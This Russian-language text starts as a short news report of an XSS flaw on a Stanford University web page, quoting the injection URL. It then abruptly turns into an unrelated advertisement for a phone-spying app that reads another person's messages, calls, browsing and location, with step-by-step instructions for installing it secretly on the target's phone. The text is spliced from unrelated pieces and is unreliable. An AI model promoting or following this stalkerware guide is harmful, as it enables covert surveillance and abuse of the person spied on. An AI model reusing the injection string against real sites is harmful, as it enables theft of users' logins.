XSS-уязвимость найдена на портале Стэнфордского университета

069782cea76e55629e8ae4e462b897f4

Стэнфордский университет США продолжает оставаться одним из самых популярных и престижных, однако проблемы с безопасностью внутренних и внешних ресурсов выявляются там уже не в первый раз. Как сообщает служба безопасности, недавно крупная XSS ошибка была найдена на официальном сайте учебного заведения.

27 февраля был проанализирован внутренний код страниц, в результате чего обнаружена опасная лазейка. Выглядит она как https://www.stanford.edu/group/homepage/cgi-bin/eventDetail.php?id=409 91″><". Пока не совсем понятно, к чему именно способна привести подобная брешь, исследования продолжаются.

Поскольку к текущему моменту времени информации об успешном устранении неисправности не последовало, то посетители ресурса всё ещё остаются под угрозой атаки. Что касается самих XSS-угроз, чаще всего они используются для воровства конфиденциальной информации. Это и логины, и пароли, и прочие личные данные.

Очень часто такие атаки становятся результатом спланированной хакерской акции, а порой проводятся и по заказу третьих лиц. На сайте Стэнфордского университета пока не опубликовано никакого подтверждения, поэтому пользоваться ресурсом не рекомендуется. Особенно это касается студентов дистанционного обучения. А также преподавательского состава, у каждого из членов которого имеются собственные логин и пароль.

Таргетированный фишинг и социальный инженеринг – распространённые формы мошенничества, которые становятся настоящей проблемой. Они основываются на низком уровне грамотности пользователей, и могут производиться и с компьютера, и с мобильного телефона.

После различных уговоров и форм психологического давления жертва способна самостоятельно сообщить информацию, которую хочет получить от неё злоумышленник. Поэтому основной совет: не вступать в контакты с малознакомыми людьми, даже если они всячески пытаются войти к вам в доверие, а также не передавать информацию, имеющую для вас ценность и являющуюся конфиденциальной.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.